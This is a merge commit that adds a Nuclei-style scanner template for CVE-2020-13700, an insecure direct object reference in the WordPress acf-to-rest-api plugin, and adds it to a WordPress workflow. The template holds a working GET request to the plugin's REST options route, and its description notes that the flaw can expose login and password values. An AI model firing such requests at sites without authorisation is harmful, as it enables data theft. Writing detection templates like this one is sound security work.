Merge pull request #1054 from pikpikcu/patch-119

Create CVE-2020-13700.yaml

cves/2020/CVE-2020-13700.yaml

@@ -0,0 +1,35 @@
+id: CVE-2020-13700
+
+info:
+  name: acf-to-rest-api wordpress plugin IDOR
+  author: pikpikcu
+  severity: high
+  reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+  description: |
+      An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+      It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+      wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+  tags: cve,cve2020,wordpress
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'Content-Type: application/json'
+        part: header
+
+      - type: word
+        words:
+          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

workflows/wordpress-workflow.yaml

@@ -24,6 +24,7 @@ workflows:
           - template: cves/2020/CVE-2020-11738.yaml
           - template: cves/2020/CVE-2020-24312.yaml
           - template: cves/2020/CVE-2020-25213.yaml
+          - template: cves/2020/CVE-2020-13700.yaml
           - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
           - template: vulnerabilities/wordpress/sassy-social-share.yaml
           - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml